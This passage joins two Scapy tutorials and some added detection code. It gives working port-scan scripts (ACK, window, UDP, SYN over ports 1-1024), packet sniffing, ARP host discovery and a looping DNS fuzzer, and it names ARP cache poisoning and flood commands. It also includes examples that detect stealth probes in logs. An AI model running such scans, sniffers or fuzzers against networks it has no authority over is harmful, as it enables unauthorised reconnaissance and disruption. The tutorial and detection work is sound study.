ack_flag_scan_resp = sr1(IP(dst=dst_ip)/TCP(sport=src_port, dport=dst_port, flags="A"), timeout=10)
if ack_flag_scan_resp is None:
    # a stateful firewall drops an ACK that belongs to no known connection
    print("Stateful firewall present\n(Filtered)")
elif ack_flag_scan_resp.haslayer(TCP):
    if ack_flag_scan_resp.getlayer(TCP).flags == 0x4:   # bare RST
        print("No firewall\n(Unfiltered)")
elif ack_flag_scan_resp.haslayer(ICMP):
    icmp = ack_flag_scan_resp.getlayer(ICMP)
    if int(icmp.type) == 3 and int(icmp.code) in [1, 2, 3, 9, 10, 13]:
        print("Stateful firewall present\n(Filtered)")
</pre>
</div>
</div>
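The FIN, NULL and ACK probes above all rely on segments that never occur in a normal TCP connection: no flags at all, a FIN without ACK, or an ACK to a port that never saw a SYN from that source. That makes them easy to pick out of a connection log. The following is an added example, not code from the original post: it reads a simplified, constructed log format (timestamp, source, destination, destination port, protocol, flag string) and reports sources whose abnormal segments touched several distinct ports. The log format, the sample addresses and the port threshold are assumptions for the example, not any real firewall's output.

```python
"""Spot FIN, NULL and bare-ACK probes in a TCP connection log (added example)."""
import re
from collections import defaultdict
from typing import Dict, List, Optional

# Constructed sample log. 192.0.2.10 behaves like a scanner; 10.0.0.7 completes a
# normal handshake (SYN, then ACK, then FIN/ACK); 10.0.0.9 sends a single stray ACK.
SAMPLE_LOG = """\
2024-05-01T10:00:01 192.0.2.10 10.0.0.1 22 tcp flags=
2024-05-01T10:00:01 192.0.2.10 10.0.0.1 80 tcp flags=
2024-05-01T10:00:02 192.0.2.10 10.0.0.1 443 tcp flags=
2024-05-01T10:00:02 192.0.2.10 10.0.0.1 25 tcp flags=F
2024-05-01T10:00:03 192.0.2.10 10.0.0.1 8080 tcp flags=A
2024-05-01T10:00:03 10.0.0.7 10.0.0.1 80 tcp flags=S
2024-05-01T10:00:03 10.0.0.7 10.0.0.1 80 tcp flags=A
2024-05-01T10:00:04 10.0.0.7 10.0.0.1 80 tcp flags=PA
2024-05-01T10:00:05 10.0.0.7 10.0.0.1 80 tcp flags=FA
2024-05-01T10:00:06 10.0.0.9 10.0.0.1 443 tcp flags=A
2024-05-01T10:00:06 10.0.0.9 10.0.0.1 53 udp flags=
"""

# Assumed log line layout: ts src dst dport proto flags=<scapy-style flag letters>
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<dst>\S+) (?P<dport>\d+) "
    r"(?P<proto>tcp|udp) flags=(?P<flags>[A-Z]*)$"
)


def parse_line(line: str) -> Optional[dict]:
    """Parse one log line into a dict, or None if it does not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["dport"] = int(rec["dport"])
    return rec


def probe_kind(flags: str) -> Optional[str]:
    """Name the stealth-probe shape a flag string has, or None for ordinary traffic."""
    if flags == "":
        return "null"
    if flags == "F":
        return "fin"
    if flags == "A":
        return "ack"      # only suspicious without a preceding SYN; the caller checks that
    return None


def find_probe_sources(lines: List[str], min_ports: int = 3) -> Dict[str, Dict[str, List[int]]]:
    """Return {src: {kind: sorted dports}} for sources whose abnormal TCP segments
    touched at least min_ports distinct destination ports."""
    handshake_seen = set()                         # (src, dst, dport) tuples that saw a SYN
    probes = defaultdict(lambda: defaultdict(set))
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["proto"] != "tcp":
            continue
        key = (rec["src"], rec["dst"], rec["dport"])
        if "S" in rec["flags"]:
            handshake_seen.add(key)                # a real connection attempt, not a probe
            continue
        kind = probe_kind(rec["flags"])
        if kind is None or key in handshake_seen:
            continue                               # ordinary traffic on a known connection
        probes[rec["src"]][kind].add(rec["dport"])

    report = {}
    for src, kinds in probes.items():
        all_ports = set().union(*kinds.values())
        if len(all_ports) >= min_ports:
            report[src] = {k: sorted(v) for k, v in kinds.items()}
    return report


if __name__ == "__main__":
    for src, kinds in find_probe_sources(SAMPLE_LOG.splitlines()).items():
        print(src, dict(kinds))
```

On the constructed log this reports only 192.0.2.10 (NULL probes to 22, 80 and 443, a FIN probe to 25 and a bare ACK to 8080); the stray ACK from 10.0.0.9 stays below the port threshold, and 10.0.0.7's ACK and FIN/ACK are ignored because a SYN preceded them on the same tuple. A real deployment would key the handshake state on the full four-tuple and expire it, but the shape of the rule is the same.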
<span style="font-size: 14pt; text-decoration: underline;"><strong>TCP window scan<br />
</strong></span><br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin16.jpg" width="621" /><br />
A TCP window scan uses the same probe as the TCP ACK scan: a TCP packet
with the ACK flag set and the port number to probe. Unlike the ACK scan,
it can be used to infer the state of the port on the server. In a TCP ACK
scan an RST only indicates an unfiltered port; in a TCP window scan, when
an RST is received from the server, the window size field of that RST is
examined. If the window size is positive, then the port is open on the server.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin17.jpg" width="621" /><br />
If the window size in the TCP packet with the RST flag set is zero, then the port is closed on the server.<br />
The code:<br />
<div>
<div class="syntaxhighlighter python" id="highlighter_244756">
<pre>
#! /usr/bin/python
# TCP window scan of one port with scapy: same bare-ACK probe as the ACK
# scan, but the window size in the returned RST decides open vs closed.
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import IP, TCP, RandShort, sr1

dst_ip = "10.0.0.1"
src_port = RandShort()   # random ephemeral source port for the probe
dst_port = 80

window_scan_resp = sr1(IP(dst=dst_ip)/TCP(sport=src_port, dport=dst_port, flags="A"), timeout=10)
if window_scan_resp is None:
    print("No response")
elif window_scan_resp.haslayer(TCP):
    tcp = window_scan_resp.getlayer(TCP)
    if tcp.window == 0:
        print("Closed")
    elif tcp.window > 0:
        print("Open")
</pre>
</div>
</div>
<span style="font-size: 14pt; text-decoration: underline;"><strong>UDP scan<br />
</strong></span><br />
TCP is a connection-oriented protocol and UDP is a connection-less protocol.<br />
A connection-oriented protocol requires a communication channel to be
established between the client and the server before any further packets
are transferred; if no such channel exists, no further communication
takes place.<br />
A connection-less protocol transfers packets without first checking
whether a communication channel to the server is available: the data is
simply sent to the destination on the assumption that the destination is
reachable.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin18.jpg" width="621" /><br />
The client sends a UDP packet with the port number to connect to. If
the server responds to the client with a UDP packet, then that
particular port is open on the server.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin19.jpg" width="621" /><br />
The client sends a UDP packet with the port number it wants to reach, and
the server responds with an ICMP port unreachable error (type 3, code 3),
meaning that the port is closed on the server.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin20.jpg" width="621" /><br />
If the server responds to the client with an ICMP error type 3 and
code 1, 2, 9, 10, or 13, then that port on the server is filtered.<br />
<img alt="" height="277" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/101613_1123_PortScannin21.jpg" width="621" /><br />
If the server sends no response to the client’s UDP request packet
for that port, it can be concluded that the port on the server is either
open or filtered. No final state of the port can be decided.<br />
The code:<br />
<div>
<div class="syntaxhighlighter python" id="highlighter_898481">
<pre>
#! /usr/bin/python
# UDP scan of one port with scapy. UDP services often stay silent, so a
# probe that gets no reply is retransmitted a few times before the port
# is reported as open|filtered.
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import IP, UDP, ICMP, RandShort, sr1

dst_ip = "10.0.0.1"
src_port = RandShort()   # random ephemeral source port for the probe
dst_port = 53
dst_timeout = 10


def classify_udp_reply(resp):
    """Map one reply (or None for a timeout) to a port state; None if undecided."""
    if resp is None:
        return None
    if resp.haslayer(UDP):
        return "Open"
    if resp.haslayer(ICMP):
        icmp = resp.getlayer(ICMP)
        if int(icmp.type) == 3 and int(icmp.code) == 3:      # port unreachable
            return "Closed"
        if int(icmp.type) == 3 and int(icmp.code) in [1, 2, 9, 10, 13]:
            return "Filtered"
    return None


def udp_scan(dst_ip, dst_port, dst_timeout, retries=3):
    # first probe plus up to `retries` retransmissions; the first decisive reply wins
    for attempt in range(1 + retries):
        resp = sr1(IP(dst=dst_ip)/UDP(sport=src_port, dport=dst_port), timeout=dst_timeout)
        state = classify_udp_reply(resp)
        if state is not None:
            return state
    return "Open|Filtered"


print(udp_scan(dst_ip, dst_port, dst_timeout))
</pre>
</div>
</div>
Explanation of some of the functions and variables used in the code above:<br />
<div>
<table border="0" style="border-collapse: collapse;">
<colgroup>
<col style="width: 125px;"></col>
<col style="width: 514px;"></col></colgroup>
<tbody valign="top">
<tr>
<td style="border-bottom: solid #4f81bd 2.25pt; border-left: solid #4f81bd 1.0pt; border-right: solid #4f81bd 1.0pt; border-top: solid #4f81bd 1.0pt; padding-left: 7px; padding-right: 7px;"><strong>Function/Variable</strong></td>
<td style="border-bottom: solid #4f81bd 2.25pt; border-left: none; border-right: solid #4f81bd 1.0pt; border-top: solid #4f81bd 1.0pt; padding-left: 7px; padding-right: 7px;"><strong>Explanation</strong></td>
</tr>
<tr style="background: #d3dfee;">
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: solid #4f81bd 1.0pt; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;"><strong>RandShort()</strong></td>
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: none; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;">Generates a random number</td>
</tr>
<tr>
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: solid #4f81bd 1.0pt; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;"><strong>type()</strong></td>
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: none; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;">Gets the type of data in a particular variable; it is passed as an argument</td>
</tr>
<tr style="background: #d3dfee;">
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: solid #4f81bd 1.0pt; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;"><strong>sport</strong></td>
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: none; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;">The source port number</td>
</tr>
<tr>
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: solid #4f81bd 1.0pt; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;"><strong>dport</strong></td>
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: none; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;">The destination port number</td>
</tr>
<tr style="background: #d3dfee;">
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: solid #4f81bd 1.0pt; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;"><strong>timeout</strong></td>
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: none; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;">The amount of time to wait for the response of a sent request packet</td>
</tr>
<tr>
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: solid #4f81bd 1.0pt; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;"><strong>haslayer()</strong></td>
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: none; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;">Checks whether a particular layer, such as TCP, UDP or ICMP, is present inside a packet</td>
</tr>
<tr style="background: #d3dfee;">
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: solid #4f81bd 1.0pt; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;"><strong>getlayer()</strong></td>
<td style="border-bottom: solid #4f81bd 1.0pt; border-left: none; border-right: solid #4f81bd 1.0pt; border-top: none; padding-left: 7px; padding-right: 7px;">Gets a particular value from a layer, such as TCP, UDP or ICMP, present inside a packet</td>
</tr>
</tbody>
</table>
</div>
This scanning approach is used in the Multiport scanner available at:<br />
<a href="https://github.com/interference-security/Multiport">https://github.com/interference-security/Multiport</a><br />
You can go ahead and see the same implementation of port scanning in this project.<br />
Scapy is a very easy-to-use tool: it makes it simple to craft your own packets and to see exactly which request packet is sent and which response packet is received.<br />
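As an added example that is not part of the original article or the Multiport project, the following standard-library Python reproduces the verdict logic of udp_scan() above (no reply, UDP reply, ICMP type 3 code 3, ICMP type 3 codes 1/2/9/10/13) against raw IPv4 bytes instead of Scapy packet objects, so it runs offline without root or a network. It also goes one step beyond the article and classifies TCP SYN probe replies (SYN/ACK, RST, ICMP unreachable, silence) using the verdicts the Nmap reference below documents. The packets it classifies are constructed in the block itself, the addresses are the ones used in the article, and every function name is this example's own.<br />

```python
"""Classify port-scan probe responses from raw IPv4 bytes (added example)."""
import socket
import struct

PROTO_ICMP, PROTO_TCP, PROTO_UDP = 1, 6, 17
# ICMP type 3 (destination unreachable) codes that udp_scan() treats as filtering.
ICMP_FILTERED_CODES = {1, 2, 9, 10, 13}


def parse_ipv4(raw):
    """Return (protocol, payload) of an IPv4 datagram; ValueError if malformed."""
    if len(raw) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl = raw[0]
    if ver_ihl >> 4 != 4:
        raise ValueError("not an IPv4 datagram")
    ihl = (ver_ihl & 0x0F) * 4
    if ihl < 20 or len(raw) < ihl:
        raise ValueError("bad IHL")
    return raw[9], raw[ihl:]            # protocol byte, transport payload


def classify_udp_response(raw):
    """Same verdicts as udp_scan(); raw is the reply datagram, or None for no reply."""
    if raw is None:
        return "Open|Filtered"          # silence: open, or dropped by a firewall
    proto, payload = parse_ipv4(raw)
    if proto == PROTO_UDP:
        return "Open"                   # the service answered
    if proto == PROTO_ICMP and len(payload) >= 2:
        icmp_type, icmp_code = payload[0], payload[1]
        if icmp_type == 3 and icmp_code == 3:
            return "Closed"             # port unreachable
        if icmp_type == 3 and icmp_code in ICMP_FILTERED_CODES:
            return "Filtered"           # net/host/admin prohibited and friends
    return "Unknown"


def classify_syn_response(raw):
    """TCP SYN probe: SYN/ACK -> Open, RST -> Closed, no reply or ICMP unreachable -> Filtered."""
    if raw is None:
        return "Filtered"
    proto, payload = parse_ipv4(raw)
    if proto == PROTO_TCP and len(payload) >= 14:
        flags = payload[13]             # low byte of the TCP flags field
        if flags & 0x12 == 0x12:        # SYN + ACK
            return "Open"
        if flags & 0x04:                # RST
            return "Closed"
    if proto == PROTO_ICMP and len(payload) >= 2 and payload[0] == 3 \
            and payload[1] in ICMP_FILTERED_CODES | {0, 3}:
        return "Filtered"
    return "Unknown"


# --- constructed test data (addresses taken from the article's examples) ---

def ipv4_checksum(header):
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4(proto, payload, src="192.168.118.1", dst="192.168.118.130"):
    """Minimal 20-byte IPv4 header (checksum filled in) followed by payload."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64,
                      proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    hdr = hdr[:10] + struct.pack("!H", ipv4_checksum(hdr)) + hdr[12:]
    return hdr + payload


def icmp_unreachable(code):
    return build_ipv4(PROTO_ICMP, struct.pack("!BBHI", 3, code, 0, 0))


def udp_reply(sport=53, dport=40000):
    return build_ipv4(PROTO_UDP, struct.pack("!HHHH", sport, dport, 8, 0))


def tcp_reply(flags, sport=80, dport=40000):
    return build_ipv4(PROTO_TCP, struct.pack("!HHIIBBHHH", sport, dport, 0, 1,
                                             0x50, flags, 65535, 0, 0))


if __name__ == "__main__":
    for label, pkt in [("no reply", None), ("udp", udp_reply()),
                       ("icmp 3/3", icmp_unreachable(3)), ("icmp 3/13", icmp_unreachable(13))]:
        print("UDP probe, %-9s -> %s" % (label, classify_udp_response(pkt)))
    for label, pkt in [("syn/ack", tcp_reply(0x12)), ("rst", tcp_reply(0x04)), ("no reply", None)]:
        print("SYN probe, %-9s -> %s" % (label, classify_syn_response(pkt)))
```

Run it directly to see each verdict; to classify a real reply captured with Scapy, pass the datagram's bytes (bytes(resp[IP])) to the same functions. Note that parse_ipv4 validates the header length before indexing, which is what keeps a truncated or non-IPv4 reply from crashing the classifier.<br />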
<span style="text-decoration: underline;"><strong>References:<br />
</strong></span><br />
<ol>
<li><a href="http://www.secdev.org/projects/scapy/doc/">http://www.secdev.org/projects/scapy/doc/</a></li>
<li><a href="http://nmap.org/book/man-port-scanning-techniques.html">http://nmap.org/book/man-port-scanning-techniques.html</a></li>
</ol>
</div>
Scapy: All-in-One Networking Tool (published 2016-12-13)<div dir="ltr" style="text-align: left;" trbidi="on">
A network is an essential part of any cyber infrastructure. There are
various tools available for the networking part of pentesting and other
security assessment tasks, like Nmap, tcpdump, arpspoof, etc., but one
tool which stands out from all of them is Scapy.<br />
Scapy is a powerful interactive packet manipulation tool written in
Python, and the best part is that it can also be utilized as a library
in Python programs, which provides the pentester the ability to create
his/her own tool based on the requirement. In this article we will
discuss how we can use Scapy as an interactive tool as well as a library
in our programs (Python). It allows us to sniff, create, send and slice
packets for analysis.<br />
Most of the tools are built with something specific in mind, like
Nmap for network scanning or Wireshark for sniffing, but Scapy allows us
to build something new utilizing its functionalities and hence opens up
a whole new world of networking applications. Unlike other tools which
provide an interpreted output of the query, Scapy will present a raw
output of any query that we make and let us decide what we need out of
it and how to interpret it. This specific advantage of the tool is very
helpful during the advanced analysis of the network. Using Scapy we can
create and send custom packets over the network and analyze the raw
output received with a minimal amount of lines of code, and it supports a
wide range of protocols for the purpose.<br />
Before going into the details of Scapy, here are a few terms that need to be defined:<br />
<ul>
<li>Scanning: The act of probing a host machine to identify any specific detail about it, e.g. port scanning.</li>
<li>Sniffing: The act of intercepting and logging the packets which flow across the network.</li>
<li>Fuzzing: A software testing technique in which random data is passed as input to a computer application to check its stability.</li>
</ul>
Scapy provides various commands from basic to advanced level for
probing a network. Let’s start with some basic commands for interactive
usage:<br />
<ul>
<li><strong>>>> ls(): Displays all the protocols supported by Scapy, as shown in figure 1.</strong></li>
<li><strong>>>> <span style="color: black;">lsc(): Displays the list of commands supported by Scapy, as shown in figure 2.</span></strong></li>
<li><strong>>>> conf: Displays configuration options.</strong></li>
<li><strong>>>> help(): Displays help on a specific command. Usage example: help(sniff)</strong></li>
<li><strong>>>> show(): Displays the details of a specific packet. Usage example: Newpacket.show()</strong></li>
</ul>
Using the above-mentioned commands is helpful for exploring the tool further.<br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100212_1607_ScapyAllinO1.png" /><br />
<div style="text-align: center;">
Figure 1. Output of commands ls() and conf</div>
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100212_1607_ScapyAllinO2.png" /><br />
<div style="text-align: center;">
Figure 2. Output of command lsc()</div>
Scapy allows us to create custom packets based on the huge set of
protocols that it supports. Let us see how we can create simple packets:<br />
<strong>>>> Newpacket=IP(dst='google.com')<br />
</strong><br />
<strong>>>> Newpacket.ttl=10<br />
</strong><br />
<strong>>>> Newpacket.show()<br />
</strong><br />
We can also create sets of packets based on our requirements. Here is
an example of simple IP packets for different destination ports.<br />
<strong>>>> basepkt=IP(dst="www.google.com")<br />
</strong><br />
<strong>>>> pktport=TCP(dport=[80,443])<br />
</strong><br />
<strong>>>> [p for p in basepkt/pktport]<br />
</strong><br />
Now that we have created packets, we need to send them over the network. We have two options for this purpose:<br />
<ul>
<li>send(), which is a layer 3 send. It decides the routing based on the local routing table.</li>
<li>sendp(), which is a layer 2 send.</li>
</ul>
To send our packet we are using send(), as shown in figure 3:<br />
<strong>>>> send(Newpacket)<br />
</strong><br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100212_1607_ScapyAllinO3.png" /><br />
<div style="text-align: center;">
Figure 3. Packet creation and sending</div>
To see if the packet is really sent we can use any sniffer like
Wireshark or tcpdump, although Scapy also provides sniffing
functionality, which we will see later in the article.<br />
We can create a ping echo request packet by simply adding the ICMP protocol after our previous packet.<br />
<strong>>>> Newpacket=IP(dst="google.com")/ICMP()<br />
</strong><br />
The operator ‘/’ is used as a composite operator between two layers.<br />
We can send this packet in the same way as our previous packet. To send the
same packet again and again we can simply add the loop=1 argument to
the send call.<br />
<strong>>>> send(Newpacket, loop=1)<br />
</strong><br />
As we have seen how to create simple packets and send them, now we
should see how to send and also receive packets. This functionality is
very useful when we need to send some packets and we expect a response
for those packets, like an ARP request. Again there are two types based
on the layers the packets are sent and received:<br />
Layer 3:<br />
<ul>
<li>sr(): It returns the answered and unanswered packets</li>
<li>sr1(): It returns only answered and sent packets</li>
</ul>
Layer 2:<br />
<ul>
<li>srp(): It returns the answered and unanswered packets</li>
<li>srp1(): It returns only answered and sent packets</li>
</ul>
Let’s see an example of the sr function.<br />
<strong>>>> output=sr(IP(dst="google.com")/ICMP())<br />
</strong><br />
<strong>>>> output<br />
</strong><br />
We see that the ‘output’ contains two different results, ‘Results’
and ‘Unanswered’. The first part contains the packets received as
response and the second part contains the packets which were not
answered. So we can divide it into two parts:<br />
<strong>>>> result, unanswered=output<br />
</strong><br />
<strong>>>> result<br />
</strong><br />
The output of the result shows that we got one ICMP packet as a
reply, so we can see the raw packet we got in response by using the
following command, as shown in figure 4.<br />
<strong>>>> result[0]<br />
</strong><br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100212_1607_ScapyAllinO4.png" /><br />
<div style="text-align: center;">
Figure 4. Sending and receiving packets</div>
If we look closely we can see that this is an echo reply packet for
our echo request. Now if we want to see the current routing table of our
machine, we can use the command:<br />
<strong>>>> conf.route<br />
</strong><br />
Scapy allows us to add user-specified routes to this table without
affecting the system's own table; this can be done by using the add
function.<br />
<strong>>>> conf.route.add(host="192.168.118.2", gw="192.168.118.25")<br />
</strong><br />
Now any packet intended for the host 192.168.118.2 would go through 192.168.118.25.<br />
After we are done using this table we can get back to the original
table simply by using the resync function, as displayed in figure 5.<br />
<strong>>>> conf.route.resync()<br />
</strong><br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100212_1607_ScapyAllinO5.png" /><br />
<div style="text-align: center;">
Figure 5. Configuring the routing table</div>
Now that we have seen how to create simple packets, send them and
receive them, let’s move forward to packet sniffing, so that we can
analyze what is happening over the network. Packet sniffing can be done
with the simple function sniff:<br />
<strong>>>> a=sniff(filter="icmp", iface="eth1", timeout=10, count=3)<br />
</strong><br />
<strong>>>> a.summary()<br />
</strong><br />
<strong>>>> a[1]<br />
</strong><br />
As demonstrated in the example, the sniff function can sniff
packets and can also filter them based on the user's requirements. To
see the output in real time we can pass a lambda function through the
prn argument, calling show or summary depending on the amount of detail we require.<br />
<strong>>>> a=sniff(filter="icmp", iface="eth1", count=3, timeout=10, prn=lambda x:x.summary())<br />
</strong><br />
Now as we have seen how easily we can sniff packets using Scapy, we
also need to learn how to save these packets for later analysis and also
how to read those saved files.<br />
To save packets we can use the function wrpcap as shown below:<br />
<strong>>>> wrpcap("mypackets.pcap", a)<br />
</strong><br />
Now if we need to read these packets we can simply use the function
rdpcap, as shown in figure 6. As pcap format is supported by many
sniffers like Wireshark, tcpdump etc., we can also analyze these files
using them.<br />
<strong>>>> rdpkt=rdpcap("mypackets.pcap")<br />
</strong><br />
<strong>>>> rdpkt.show()<br />
</strong><br />
<strong>>>> rdpkt[1]<br />
</strong><br />
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/100212_1607_ScapyAllinO6.png" /><br />
<div style="text-align: center;">
Figure 6. Sniffing, writing and reading packets</div>
As Scapy allows us to create custom packets, we can use this
functionality to perform port scanning. Here is an example of simple
port scanning using the interactive interface. We will create a TCP/IP
packet with the TCP flag set to 'S' (SYN) for ports 1 to 1024.<br />
<strong>>>> res,unans = sr(IP(dst="192.168.118.1")/TCP(flags="S", dport=(1,1024)))<br />
</strong><br />
The output can be analyzed by using the command<br />
<strong>>>> res.summary()<br />
</strong><br />
Apart from packet creation, Scapy can also perform simple networking
functions such as ping, traceroute etc. Example of a simple traceroute
of google.com is shown here:<br />
<strong>>>> traceroute("www.google.com")<br />
</strong><br />
Scapy also contains commands for some network based attacks such as
arpcachepoison, etherleak, srpflood etc. These commands can be very
useful during a network security analysis. If we need to discover the
hosts on the local Ethernet we can use the command arping.<br />
<strong>>>> arping("192.168.118.*")<br />
</strong><br />
Scapy also provides fuzzing functionality through the function fuzz; here is an example of a simple DNS fuzzer:<br />
<strong>>>> send(IP(dst="192.168.118.1")/UDP()/fuzz(DNS()), inter=1, loop=1)<br />
</strong><br />
We have seen how we can use Scapy as a tool and use its various
functions interactively. Now let’s see how to use Scapy in Python
programs, through simple example codes. The example codes demonstrate
how easily we can create programs in Python using the Scapy library and
create powerful tools with minimum amount of coding.<br />
The code shown below is a simple Python program which sends ARP requests, waits for the responses and displays them.<br />
<pre>#!/usr/bin/python
# import the sys module for the command line argument
import sys
# import scapy as a library
from scapy.all import *

print("Usage: scapy-arping eg: ./scapy-arping.py 192.168.1.0/24")
if len(sys.argv) != 2:
    sys.exit(1)

# create and send ARP request packets (layer 2 broadcast, so srp), waiting 2 s for answers
rec, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=sys.argv[1]), timeout=2)

# print the result: one line per host that answered
for send, recv in rec:
    print(recv.sprintf("MAC: %Ether.src% <–> IP: %ARP.psrc%"))
</pre>
The example output of this program is shown below:<br />
<strong>root@bt:~/Desktop# ./scapy-arping.py 192.168.118.0/24<br />
</strong><br />
<strong>WARNING: No route found for IPv6 destination :: (no default route?)<br />
</strong><br />
<strong>Usage: scapy-arping eg: ./scapy-arping.py 192.168.1.0/24<br />
</strong><br />
<strong>Begin emission:<br />
</strong><br />
<strong>**Finished to send 256 packets.<br />
</strong><br />
<strong>*<br />
</strong><br />
<strong>Received 3 packets, got 3 answers, remaining 253 packets<br />
</strong><br />
<strong>MAC: 00:50:56:f5:48:7a <–> IP: 192.168.118.2<br />
</strong><br />
<strong>MAC: 00:50:56:c0:00:08 <–> IP: 192.168.118.1<br />
</strong><br />
<strong>MAC: 00:50:56:f8:5e:b3 <–> IP: 192.168.118.254<br />
</strong><br />
Another example code for a simple ARP monitor is shown below (source: <a href="http://www.secdev.org/projects/scapy/doc/usage.html">http://www.secdev.org/projects/scapy/doc/usage.html#recipes</a>). The program simply monitors for any ARP request or reply and prints the associated MAC and IP address.<br />
<pre>#! /usr/bin/env python
from scapy.all import *

def arp_monitor_callback(pkt):
    # op 1 = who-has (request), op 2 = is-at (reply)
    if ARP in pkt and pkt[ARP].op in (1, 2):
        return pkt.sprintf("%ARP.hwsrc% %ARP.psrc%")

# store=0: do not keep the packets in memory, just run the callback on each one
sniff(prn=arp_monitor_callback, filter="arp", store=0)
</pre>
Example output for the program is shown below:<br />
<strong>root@bt:~/Desktop# ./arpmonitor.py<br />
</strong><br />
<strong>WARNING: No route found for IPv6 destination :: (no default route?)<br />
</strong><br />
<strong>00:50:56:c0:00:08 192.168.118.1<br />
</strong><br />
<strong>00:0c:29:d8:b6:4d 192.168.118.130<br />
</strong><br />
<strong>00:0c:29:d8:b6:4d 192.168.118.130<br />
</strong><br />
<strong>00:50:56:c0:00:08 192.168.118.1<br />
</strong><br />
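The wrpcap()/rdpcap() round trip shown earlier and the ARP-monitor callback above, as one added example that is not from the article or from Scapy: it writes constructed ARP frames (the MAC and IP addresses are the ones in the sample output) to a pcap file using only the standard library, reads the file back while validating the global header and every record length, and applies the same who-has/is-at check to each frame. The function names (build_arp_frame, write_pcap, read_pcap, arp_monitor, demo) are this example's own.<br />

```python
"""Write ARP frames to a pcap file, read them back, run the ARP-monitor check (added example)."""
import os
import socket
import struct
import tempfile

PCAP_MAGIC = 0xA1B2C3D4         # microsecond-resolution pcap, as written on this host
LINKTYPE_ETHERNET = 1
ETHERTYPE_ARP = 0x0806
ARP_FMT = "!HHBBH6s4s6s4s"      # htype, ptype, hlen, plen, op, sha, spa, tha, tpa


def mac_bytes(text):
    return bytes(int(part, 16) for part in text.split(":"))


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def build_arp_frame(op, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet + ARP frame (constructed data); op 1 = who-has (broadcast), op 2 = is-at."""
    eth_dst = mac_bytes(target_mac) if op == 2 else b"\xff" * 6
    eth = eth_dst + mac_bytes(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack(ARP_FMT, 1, 0x0800, 6, 4, op,
                      mac_bytes(sender_mac), socket.inet_aton(sender_ip),
                      mac_bytes(target_mac), socket.inet_aton(target_ip))
    return eth + arp


def write_pcap(path, frames, first_ts=1481651400):
    """Equivalent of wrpcap(): global header, then a record header per frame."""
    with open(path, "wb") as f:
        f.write(struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET))
        for i, frame in enumerate(frames):
            f.write(struct.pack("<IIII", first_ts + i, 0, len(frame), len(frame)))
            f.write(frame)
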